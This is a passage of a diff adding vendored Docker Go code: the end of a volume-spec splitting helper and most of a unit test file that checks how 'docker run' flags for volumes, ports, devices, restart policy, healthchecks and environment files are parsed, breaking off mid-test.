+			// if `:` is not preceded by a potential drive letter, then consider it as a delimiter.
+			array = append(array, raw[left:right])
+			left = right + 1
+			numberOfParts++
+		}
+	}
+	// need to take care of the last part
+	if left < len(raw) {
+		if n >= 0 && numberOfParts >= n {
+			// if the maximum number of parts is reached, just append the rest to the last part
+			// left-1 is at the last `:` that needs to be included since not considered a separator.
+			array[n-1] += raw[left-1:]
+		} else {
+			array = append(array, raw[left:])
+		}
+	}
+	return array
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse_test.go b/vendor/github.com/docker/docker/runconfig/opts/parse_test.go
new file mode 100644
index 0000000000..a1be379ae8
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/parse_test.go
@@ -0,0 +1,894 @@
+package opts
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"runtime"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+	networktypes "github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/runconfig"
+	"github.com/docker/go-connections/nat"
+	"github.com/spf13/pflag"
+)
+
+func parseRun(args []string) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) {
+	flags := pflag.NewFlagSet("run", pflag.ContinueOnError)
+	flags.SetOutput(ioutil.Discard)
+	flags.Usage = nil
+	copts := AddFlags(flags)
+	if err := flags.Parse(args); err != nil {
+		return nil, nil, nil, err
+	}
+	return Parse(flags, copts)
+}
+
+func parse(t *testing.T, args string) (*container.Config, *container.HostConfig, error) {
+	config, hostConfig, _, err := parseRun(strings.Split(args+" ubuntu bash", " "))
+	return config, hostConfig, err
+}
+
+func mustParse(t *testing.T, args string) (*container.Config, *container.HostConfig) {
+	config, hostConfig, err := parse(t, args)
+	if err != nil {
+		t.Fatal(err)
+	}
+	return config, hostConfig
+}
+
+func TestParseRunLinks(t *testing.T) {
+	if _, hostConfig := mustParse(t, "--link a:b"); len(hostConfig.Links) == 0 || hostConfig.Links[0] != "a:b" {
+		t.Fatalf("Error parsing links. Expected []string{\"a:b\"}, received: %v", hostConfig.Links)
+	}
+	if _, hostConfig := mustParse(t, "--link a:b --link c:d"); len(hostConfig.Links) < 2 || hostConfig.Links[0] != "a:b" || hostConfig.Links[1] != "c:d" {
+		t.Fatalf("Error parsing links. Expected []string{\"a:b\", \"c:d\"}, received: %v", hostConfig.Links)
+	}
+	if _, hostConfig := mustParse(t, ""); len(hostConfig.Links) != 0 {
+		t.Fatalf("Error parsing links. No link expected, received: %v", hostConfig.Links)
+	}
+}
+
+func TestParseRunAttach(t *testing.T) {
+	if config, _ := mustParse(t, "-a stdin"); !config.AttachStdin || config.AttachStdout || config.AttachStderr {
+		t.Fatalf("Error parsing attach flags. Expect only Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr)
+	}
+	if config, _ := mustParse(t, "-a stdin -a stdout"); !config.AttachStdin || !config.AttachStdout || config.AttachStderr {
+		t.Fatalf("Error parsing attach flags. Expect only Stdin and Stdout enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr)
+	}
+	if config, _ := mustParse(t, "-a stdin -a stdout -a stderr"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr {
+		t.Fatalf("Error parsing attach flags. Expect all attach enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr)
+	}
+	if config, _ := mustParse(t, ""); config.AttachStdin || !config.AttachStdout || !config.AttachStderr {
+		t.Fatalf("Error parsing attach flags. Expect Stdin disabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr)
+	}
+	if config, _ := mustParse(t, "-i"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr {
+		t.Fatalf("Error parsing attach flags. Expect Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr)
+	}
+
+	if _, _, err := parse(t, "-a"); err == nil {
+		t.Fatalf("Error parsing attach flags, `-a` should be an error but is not")
+	}
+	if _, _, err := parse(t, "-a invalid"); err == nil {
+		t.Fatalf("Error parsing attach flags, `-a invalid` should be an error but is not")
+	}
+	if _, _, err := parse(t, "-a invalid -a stdout"); err == nil {
+		t.Fatalf("Error parsing attach flags, `-a stdout -a invalid` should be an error but is not")
+	}
+	if _, _, err := parse(t, "-a stdout -a stderr -d"); err == nil {
+		t.Fatalf("Error parsing attach flags, `-a stdout -a stderr -d` should be an error but is not")
+	}
+	if _, _, err := parse(t, "-a stdin -d"); err == nil {
+		t.Fatalf("Error parsing attach flags, `-a stdin -d` should be an error but is not")
+	}
+	if _, _, err := parse(t, "-a stdout -d"); err == nil {
+		t.Fatalf("Error parsing attach flags, `-a stdout -d` should be an error but is not")
+	}
+	if _, _, err := parse(t, "-a stderr -d"); err == nil {
+		t.Fatalf("Error parsing attach flags, `-a stderr -d` should be an error but is not")
+	}
+	if _, _, err := parse(t, "-d --rm"); err == nil {
+		t.Fatalf("Error parsing attach flags, `-d --rm` should be an error but is not")
+	}
+}
+
+func TestParseRunVolumes(t *testing.T) {
+
+	// A single volume
+	arr, tryit := setupPlatformVolume([]string{`/tmp`}, []string{`c:\tmp`})
+	if config, hostConfig := mustParse(t, tryit); hostConfig.Binds != nil {
+		t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds)
+	} else if _, exists := config.Volumes[arr[0]]; !exists {
+		t.Fatalf("Error parsing volume flags, %q is missing from volumes. Received %v", tryit, config.Volumes)
+	}
+
+	// Two volumes
+	arr, tryit = setupPlatformVolume([]string{`/tmp`, `/var`}, []string{`c:\tmp`, `c:\var`})
+	if config, hostConfig := mustParse(t, tryit); hostConfig.Binds != nil {
+		t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds)
+	} else if _, exists := config.Volumes[arr[0]]; !exists {
+		t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[0], config.Volumes)
+	} else if _, exists := config.Volumes[arr[1]]; !exists {
+		t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[1], config.Volumes)
+	}
+
+	// A single bind-mount
+	arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`})
+	if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || hostConfig.Binds[0] != arr[0] {
+		t.Fatalf("Error parsing volume flags, %q should mount-bind the path before the colon into the path after the colon. Received %v %v", arr[0], hostConfig.Binds, config.Volumes)
+	}
+
+	// Two bind-mounts.
+	arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/hostVar:/containerVar`}, []string{os.Getenv("ProgramData") + `:c:\ContainerPD`, os.Getenv("TEMP") + `:c:\containerTmp`})
+	if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil {
+		t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds)
+	}
+
+	// Two bind-mounts, first read-only, second read-write.
+	// TODO Windows: The Windows version uses read-write as that's the only mode it supports. Can change this post TP4
+	arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro`, `/hostVar:/containerVar:rw`}, []string{os.Getenv("TEMP") + `:c:\containerTmp:rw`, os.Getenv("ProgramData") + `:c:\ContainerPD:rw`})
+	if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil {
+		t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds)
+	}
+
+	// Similar to previous test but with alternate modes which are only supported by Linux
+	if runtime.GOOS != "windows" {
+		arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro,Z`, `/hostVar:/containerVar:rw,Z`}, []string{})
+		if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil {
+			t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds)
+		}
+
+		arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:Z`, `/hostVar:/containerVar:z`}, []string{})
+		if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil {
+			t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds)
+		}
+	}
+
+	// One bind mount and one volume
+	arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/containerVar`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`, `c:\containerTmp`})
+	if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] {
+		t.Fatalf("Error parsing volume flags, %s and %s should only one and only one bind mount %s. Received %s", arr[0], arr[1], arr[0], hostConfig.Binds)
+	} else if _, exists := config.Volumes[arr[1]]; !exists {
+		t.Fatalf("Error parsing volume flags %s and %s. %s is missing from volumes. Received %v", arr[0], arr[1], arr[1], config.Volumes)
+	}
+
+	// Root to non-c: drive letter (Windows specific)
+	if runtime.GOOS == "windows" {
+		arr, tryit = setupPlatformVolume([]string{}, []string{os.Getenv("SystemDrive") + `\:d:`})
+		if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] || len(config.Volumes) != 0 {
+			t.Fatalf("Error parsing %s. Should have a single bind mount and no volumes", arr[0])
+		}
+	}
+
+}
+
+// This tests the cases for binds which are generated through
+// DecodeContainerConfig rather than Parse()
+func TestDecodeContainerConfigVolumes(t *testing.T) {
+
+	// Root to root
+	bindsOrVols, _ := setupPlatformVolume([]string{`/:/`}, []string{os.Getenv("SystemDrive") + `\:c:\`})
+	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
+		t.Fatalf("binds %v should have failed", bindsOrVols)
+	}
+	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
+		t.Fatalf("volume %v should have failed", bindsOrVols)
+	}
+
+	// No destination path
+	bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:`}, []string{os.Getenv("TEMP") + `\:`})
+	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
+		t.Fatalf("binds %v should have failed", bindsOrVols)
+	}
+	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
+		t.Fatalf("volume %v should have failed", bindsOrVols)
+	}
+
+	//	// No destination path or mode
+	bindsOrVols, _ = setupPlatformVolume([]string{`/tmp::`}, []string{os.Getenv("TEMP") + `\::`})
+	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
+		t.Fatalf("binds %v should have failed", bindsOrVols)
+	}
+	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
+		t.Fatalf("volume %v should have failed", bindsOrVols)
+	}
+
+	// A whole lot of nothing
+	bindsOrVols = []string{`:`}
+	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
+		t.Fatalf("binds %v should have failed", bindsOrVols)
+	}
+	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
+		t.Fatalf("volume %v should have failed", bindsOrVols)
+	}
+
+	// A whole lot of nothing with no mode
+	bindsOrVols = []string{`::`}
+	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
+		t.Fatalf("binds %v should have failed", bindsOrVols)
+	}
+	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
+		t.Fatalf("volume %v should have failed", bindsOrVols)
+	}
+
+	// Too much including an invalid mode
+	wTmp := os.Getenv("TEMP")
+	bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:/tmp:/tmp:/tmp`}, []string{wTmp + ":" + wTmp + ":" + wTmp + ":" + wTmp})
+	if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
+		t.Fatalf("binds %v should have failed", bindsOrVols)
+	}
+	if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
+		t.Fatalf("volume %v should have failed", bindsOrVols)
+	}
+
+	// Windows specific error tests
+	if runtime.GOOS == "windows" {
+		// Volume which does not include a drive letter
+		bindsOrVols = []string{`\tmp`}
+		if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
+			t.Fatalf("binds %v should have failed", bindsOrVols)
+		}
+		if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
+			t.Fatalf("volume %v should have failed", bindsOrVols)
+		}
+
+		// Root to C-Drive
+		bindsOrVols = []string{os.Getenv("SystemDrive") + `\:c:`}
+		if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
+			t.Fatalf("binds %v should have failed", bindsOrVols)
+		}
+		if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
+			t.Fatalf("volume %v should have failed", bindsOrVols)
+		}
+
+		// Container path that does not include a drive letter
+		bindsOrVols = []string{`c:\windows:\somewhere`}
+		if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
+			t.Fatalf("binds %v should have failed", bindsOrVols)
+		}
+		if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
+			t.Fatalf("volume %v should have failed", bindsOrVols)
+		}
+	}
+
+	// Linux-specific error tests
+	if runtime.GOOS != "windows" {
+		// Just root
+		bindsOrVols = []string{`/`}
+		if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil {
+			t.Fatalf("binds %v should have failed", bindsOrVols)
+		}
+		if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil {
+			t.Fatalf("volume %v should have failed", bindsOrVols)
+		}
+
+		// A single volume that looks like a bind mount passed in Volumes.
+		// This should be handled as a bind mount, not a volume.
+		vols := []string{`/foo:/bar`}
+		if config, hostConfig, err := callDecodeContainerConfig(vols, nil); err != nil {
+			t.Fatal("Volume /foo:/bar should have succeeded as a volume name")
+		} else if hostConfig.Binds != nil {
+			t.Fatalf("Error parsing volume flags, /foo:/bar should not mount-bind anything. Received %v", hostConfig.Binds)
+		} else if _, exists := config.Volumes[vols[0]]; !exists {
+			t.Fatalf("Error parsing volume flags, /foo:/bar is missing from volumes. Received %v", config.Volumes)
+		}
+
+	}
+}
+
+// callDecodeContainerConfig is a utility function used by TestDecodeContainerConfigVolumes
+// to call DecodeContainerConfig. It effectively does what a client would
+// do when calling the daemon by constructing a JSON stream of a
+// ContainerConfigWrapper which is populated by the set of volume specs
+// passed into it. It returns a config and a hostconfig which can be
+// validated to ensure DecodeContainerConfig has manipulated the structures
+// correctly.
+func callDecodeContainerConfig(volumes []string, binds []string) (*container.Config, *container.HostConfig, error) {
+	var (
+		b   []byte
+		err error
+		c   *container.Config
+		h   *container.HostConfig
+	)
+	w := runconfig.ContainerConfigWrapper{
+		Config: &container.Config{
+			Volumes: map[string]struct{}{},
+		},
+		HostConfig: &container.HostConfig{
+			NetworkMode: "none",
+			Binds:       binds,
+		},
+	}
+	for _, v := range volumes {
+		w.Config.Volumes[v] = struct{}{}
+	}
+	if b, err = json.Marshal(w); err != nil {
+		return nil, nil, fmt.Errorf("Error on marshal %s", err.Error())
+	}
+	c, h, _, err = runconfig.DecodeContainerConfig(bytes.NewReader(b))
+	if err != nil {
+		return nil, nil, fmt.Errorf("Error parsing %s: %v", string(b), err)
+	}
+	if c == nil || h == nil {
+		return nil, nil, fmt.Errorf("Empty config or hostconfig")
+	}
+
+	return c, h, err
+}
+
+// check if (a == c && b == d) || (a == d && b == c)
+// because maps are randomized
+func compareRandomizedStrings(a, b, c, d string) error {
+	if a == c && b == d {
+		return nil
+	}
+	if a == d && b == c {
+		return nil
+	}
+	return fmt.Errorf("strings don't match")
+}
+
+// setupPlatformVolume takes two arrays of volume specs - a Unix style
+// spec and a Windows style spec. Depending on the platform being unit tested,
+// it returns one of them, along with a volume string that would be passed
+// on the docker CLI (eg -v /bar -v /foo).
+func setupPlatformVolume(u []string, w []string) ([]string, string) {
+	var a []string
+	if runtime.GOOS == "windows" {
+		a = w
+	} else {
+		a = u
+	}
+	s := ""
+	for _, v := range a {
+		s = s + "-v " + v + " "
+	}
+	return a, s
+}
+
+// Simple parse with MacAddress validation
+func TestParseWithMacAddress(t *testing.T) {
+	invalidMacAddress := "--mac-address=invalidMacAddress"
+	validMacAddress := "--mac-address=92:d0:c6:0a:29:33"
+	if _, _, _, err := parseRun([]string{invalidMacAddress, "img", "cmd"}); err != nil && err.Error() != "invalidMacAddress is not a valid mac address" {
+		t.Fatalf("Expected an error with %v mac-address, got %v", invalidMacAddress, err)
+	}
+	if config, _ := mustParse(t, validMacAddress); config.MacAddress != "92:d0:c6:0a:29:33" {
+		t.Fatalf("Expected the config to have '92:d0:c6:0a:29:33' as MacAddress, got '%v'", config.MacAddress)
+	}
+}
+
+func TestParseWithMemory(t *testing.T) {
+	invalidMemory := "--memory=invalid"
+	validMemory := "--memory=1G"
+	if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err != nil && err.Error() != "invalid size: 'invalid'" {
+		t.Fatalf("Expected an error with '%v' Memory, got '%v'", invalidMemory, err)
+	}
+	if _, hostconfig := mustParse(t, validMemory); hostconfig.Memory != 1073741824 {
+		t.Fatalf("Expected the config to have '1G' as Memory, got '%v'", hostconfig.Memory)
+	}
+}
+
+func TestParseWithMemorySwap(t *testing.T) {
+	invalidMemory := "--memory-swap=invalid"
+	validMemory := "--memory-swap=1G"
+	anotherValidMemory := "--memory-swap=-1"
+	if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err == nil || err.Error() != "invalid size: 'invalid'" {
+		t.Fatalf("Expected an error with '%v' MemorySwap, got '%v'", invalidMemory, err)
+	}
+	if _, hostconfig := mustParse(t, validMemory); hostconfig.MemorySwap != 1073741824 {
+		t.Fatalf("Expected the config to have '1073741824' as MemorySwap, got '%v'", hostconfig.MemorySwap)
+	}
+	if _, hostconfig := mustParse(t, anotherValidMemory); hostconfig.MemorySwap != -1 {
+		t.Fatalf("Expected the config to have '-1' as MemorySwap, got '%v'", hostconfig.MemorySwap)
+	}
+}
+
+func TestParseHostname(t *testing.T) {
+	validHostnames := map[string]string{
+		"hostname":    "hostname",
+		"host-name":   "host-name",
+		"hostname123": "hostname123",
+		"123hostname": "123hostname",
+		"hostname-of-63-bytes-long-should-be-valid-and-without-any-error": "hostname-of-63-bytes-long-should-be-valid-and-without-any-error",
+	}
+	hostnameWithDomain := "--hostname=hostname.domainname"
+	hostnameWithDomainTld := "--hostname=hostname.domainname.tld"
+	for hostname, expectedHostname := range validHostnames {
+		if config, _ := mustParse(t, fmt.Sprintf("--hostname=%s", hostname)); config.Hostname != expectedHostname {
+			t.Fatalf("Expected the config to have 'hostname' as hostname, got '%v'", config.Hostname)
+		}
+	}
+	if config, _ := mustParse(t, hostnameWithDomain); config.Hostname != "hostname.domainname" && config.Domainname != "" {
+		t.Fatalf("Expected the config to have 'hostname' as hostname.domainname, got '%v'", config.Hostname)
+	}
+	if config, _ := mustParse(t, hostnameWithDomainTld); config.Hostname != "hostname.domainname.tld" && config.Domainname != "" {
+		t.Fatalf("Expected the config to have 'hostname' as hostname.domainname.tld, got '%v'", config.Hostname)
+	}
+}
+
+func TestParseWithExpose(t *testing.T) {
+	invalids := map[string]string{
+		":":                   "invalid port format for --expose: :",
+		"8080:9090":           "invalid port format for --expose: 8080:9090",
+		"/tcp":                "invalid range format for --expose: /tcp, error: Empty string specified for ports.",
+		"/udp":                "invalid range format for --expose: /udp, error: Empty string specified for ports.",
+		"NaN/tcp":             `invalid range format for --expose: NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`,
+		"NaN-NaN/tcp":         `invalid range format for --expose: NaN-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`,
+		"8080-NaN/tcp":        `invalid range format for --expose: 8080-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`,
+		"1234567890-8080/tcp": `invalid range format for --expose: 1234567890-8080/tcp, error: strconv.ParseUint: parsing "1234567890": value out of range`,
+	}
+	valids := map[string][]nat.Port{
+		"8080/tcp":      {"8080/tcp"},
+		"8080/udp":      {"8080/udp"},
+		"8080/ncp":      {"8080/ncp"},
+		"8080-8080/udp": {"8080/udp"},
+		"8080-8082/tcp": {"8080/tcp", "8081/tcp", "8082/tcp"},
+	}
+	for expose, expectedError := range invalids {
+		if _, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"}); err == nil || err.Error() != expectedError {
+			t.Fatalf("Expected error '%v' with '--expose=%v', got '%v'", expectedError, expose, err)
+		}
+	}
+	for expose, exposedPorts := range valids {
+		config, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"})
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(config.ExposedPorts) != len(exposedPorts) {
+			t.Fatalf("Expected %v exposed port, got %v", len(exposedPorts), len(config.ExposedPorts))
+		}
+		for _, port := range exposedPorts {
+			if _, ok := config.ExposedPorts[port]; !ok {
+				t.Fatalf("Expected %v, got %v", exposedPorts, config.ExposedPorts)
+			}
+		}
+	}
+	// Merge with actual published port
+	config, _, _, err := parseRun([]string{"--publish=80", "--expose=80-81/tcp", "img", "cmd"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(config.ExposedPorts) != 2 {
+		t.Fatalf("Expected 2 exposed ports, got %v", config.ExposedPorts)
+	}
+	ports := []nat.Port{"80/tcp", "81/tcp"}
+	for _, port := range ports {
+		if _, ok := config.ExposedPorts[port]; !ok {
+			t.Fatalf("Expected %v, got %v", ports, config.ExposedPorts)
+		}
+	}
+}
+
+func TestParseDevice(t *testing.T) {
+	valids := map[string]container.DeviceMapping{
+		"/dev/snd": {
+			PathOnHost:        "/dev/snd",
+			PathInContainer:   "/dev/snd",
+			CgroupPermissions: "rwm",
+		},
+		"/dev/snd:rw": {
+			PathOnHost:        "/dev/snd",
+			PathInContainer:   "/dev/snd",
+			CgroupPermissions: "rw",
+		},
+		"/dev/snd:/something": {
+			PathOnHost:        "/dev/snd",
+			PathInContainer:   "/something",
+			CgroupPermissions: "rwm",
+		},
+		"/dev/snd:/something:rw": {
+			PathOnHost:        "/dev/snd",
+			PathInContainer:   "/something",
+			CgroupPermissions: "rw",
+		},
+	}
+	for device, deviceMapping := range valids {
+		_, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--device=%v", device), "img", "cmd"})
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(hostconfig.Devices) != 1 {
+			t.Fatalf("Expected 1 devices, got %v", hostconfig.Devices)
+		}
+		if hostconfig.Devices[0] != deviceMapping {
+			t.Fatalf("Expected %v, got %v", deviceMapping, hostconfig.Devices)
+		}
+	}
+
+}
+
+func TestParseModes(t *testing.T) {
+	// ipc ko
+	if _, _, _, err := parseRun([]string{"--ipc=container:", "img", "cmd"}); err == nil || err.Error() != "--ipc: invalid IPC mode" {
+		t.Fatalf("Expected an error with message '--ipc: invalid IPC mode', got %v", err)
+	}
+	// ipc ok
+	_, hostconfig, _, err := parseRun([]string{"--ipc=host", "img", "cmd"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !hostconfig.IpcMode.Valid() {
+		t.Fatalf("Expected a valid IpcMode, got %v", hostconfig.IpcMode)
+	}
+	// pid ko
+	if _, _, _, err := parseRun([]string{"--pid=container:", "img", "cmd"}); err == nil || err.Error() != "--pid: invalid PID mode" {
+		t.Fatalf("Expected an error with message '--pid: invalid PID mode', got %v", err)
+	}
+	// pid ok
+	_, hostconfig, _, err = parseRun([]string{"--pid=host", "img", "cmd"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !hostconfig.PidMode.Valid() {
+		t.Fatalf("Expected a valid PidMode, got %v", hostconfig.PidMode)
+	}
+	// uts ko
+	if _, _, _, err := parseRun([]string{"--uts=container:", "img", "cmd"}); err == nil || err.Error() != "--uts: invalid UTS mode" {
+		t.Fatalf("Expected an error with message '--uts: invalid UTS mode', got %v", err)
+	}
+	// uts ok
+	_, hostconfig, _, err = parseRun([]string{"--uts=host", "img", "cmd"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !hostconfig.UTSMode.Valid() {
+		t.Fatalf("Expected a valid UTSMode, got %v", hostconfig.UTSMode)
+	}
+	// shm-size ko
+	if _, _, _, err = parseRun([]string{"--shm-size=a128m", "img", "cmd"}); err == nil || err.Error() != "invalid size: 'a128m'" {
+		t.Fatalf("Expected an error with message 'invalid size: a128m', got %v", err)
+	}
+	// shm-size ok
+	_, hostconfig, _, err = parseRun([]string{"--shm-size=128m", "img", "cmd"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if hostconfig.ShmSize != 134217728 {
+		t.Fatalf("Expected a valid ShmSize, got %d", hostconfig.ShmSize)
+	}
+}
+
+func TestParseRestartPolicy(t *testing.T) {
+	invalids := map[string]string{
+		"always:2:3":         "invalid restart policy format",
+		"on-failure:invalid": "maximum retry count must be an integer",
+	}
+	valids := map[string]container.RestartPolicy{
+		"": {},
+		"always": {
+			Name:              "always",
+			MaximumRetryCount: 0,
+		},
+		"on-failure:1": {
+			Name:              "on-failure",
+			MaximumRetryCount: 1,
+		},
+	}
+	for restart, expectedError := range invalids {
+		if _, _, _, err := parseRun([]string{fmt.Sprintf("--restart=%s", restart), "img", "cmd"}); err == nil || err.Error() != expectedError {
+			t.Fatalf("Expected an error with message '%v' for %v, got %v", expectedError, restart, err)
+		}
+	}
+	for restart, expected := range valids {
+		_, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--restart=%v", restart), "img", "cmd"})
+		if err != nil {
+			t.Fatal(err)
+		}
+		if hostconfig.RestartPolicy != expected {
+			t.Fatalf("Expected %v, got %v", expected, hostconfig.RestartPolicy)
+		}
+	}
+}
+
+func TestParseHealth(t *testing.T) {
+	checkOk := func(args ...string) *container.HealthConfig {
+		config, _, _, err := parseRun(args)
+		if err != nil {
+			t.Fatalf("%#v: %v", args, err)
+		}
+		return config.Healthcheck
+	}
+	checkError := func(expected string, args ...string) {
+		config, _, _, err := parseRun(args)
+		if err == nil {
+			t.Fatalf("Expected error, but got %#v", config)
+		}
+		if err.Error() != expected {
+			t.Fatalf("Expected %#v, got %#v", expected, err)
+		}
+	}
+	health := checkOk("--no-healthcheck", "img", "cmd")
+	if health == nil || len(health.Test) != 1 || health.Test[0] != "NONE" {
+		t.Fatalf("--no-healthcheck failed: %#v", health)
+	}
+
+	health = checkOk("--health-cmd=/check.sh -q", "img", "cmd")
+	if len(health.Test) != 2 || health.Test[0] != "CMD-SHELL" || health.Test[1] != "/check.sh -q" {
+		t.Fatalf("--health-cmd: got %#v", health.Test)
+	}
+	if health.Timeout != 0 {
+		t.Fatalf("--health-cmd: timeout = %f", health.Timeout)
+	}
+
+	checkError("--no-healthcheck conflicts with --health-* options",
+		"--no-healthcheck", "--health-cmd=/check.sh -q", "img", "cmd")
+
+	health = checkOk("--health-timeout=2s", "--health-retries=3", "--health-interval=4.5s", "img", "cmd")
+	if health.Timeout != 2*time.Second || health.Retries != 3 || health.Interval != 4500*time.Millisecond {
+		t.Fatalf("--health-*: got %#v", health)
+	}
+}
+
+func TestParseLoggingOpts(t *testing.T) {
+	// logging opts ko
+	if _, _, _, err := parseRun([]string{"--log-driver=none", "--log-opt=anything", "img", "cmd"}); err == nil || err.Error() != "invalid logging opts for driver none" {
+		t.Fatalf("Expected an error with message 'invalid logging opts for driver none', got %v", err)
+	}
+	// logging opts ok
+	_, hostconfig, _, err := parseRun([]string{"--log-driver=syslog", "--log-opt=something", "img", "cmd"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if hostconfig.LogConfig.Type != "syslog" || len(hostconfig.LogConfig.Config) != 1 {
+		t.Fatalf("Expected a 'syslog' LogConfig with one config, got %v", hostconfig.RestartPolicy)
+	}
+}
+
+func TestParseEnvfileVariables(t *testing.T) {
+	e := "open nonexistent: no such file or directory"
+	if runtime.GOOS == "windows" {
+		e = "open nonexistent: The system cannot find the file specified."
+	}
+	// env ko
+	if _, _, _, err := parseRun([]string{"--env-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e {
+		t.Fatalf("Expected an error with message '%s', got %v", e, err)
+	}
+	// env ok
+	config, _, _, err := parseRun([]string{"--env-file=fixtures/valid.env", "img", "cmd"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(config.Env) != 1 || config.Env[0] != "ENV1=value1" {
+		t.Fatalf("Expected a config with [ENV1=value1], got %v", config.Env)
+	}
+	config, _, _, err = parseRun([]string{"--env-file=fixtures/valid.env", "--env=ENV2=value2", "img", "cmd"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(config.Env) != 2 || config.Env[0] != "ENV1=value1" || config.Env[1] != "ENV2=value2" {
+		t.Fatalf("Expected a config with [ENV1=value1 ENV2=value2], got %v", config.Env)
+	}
+}
+
+func TestParseEnvfileVariablesWithBOMUnicode(t *testing.T) {
+	// UTF8 with BOM
+	config, _, _, err := parseRun([]string{"--env-file=fixtures/utf8.env", "img", "cmd"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	env := []string{"FOO=BAR", "HELLO=" + string([]byte{0xe6, 0x82, 0xa8, 0xe5, 0xa5, 0xbd}), "BAR=FOO"}
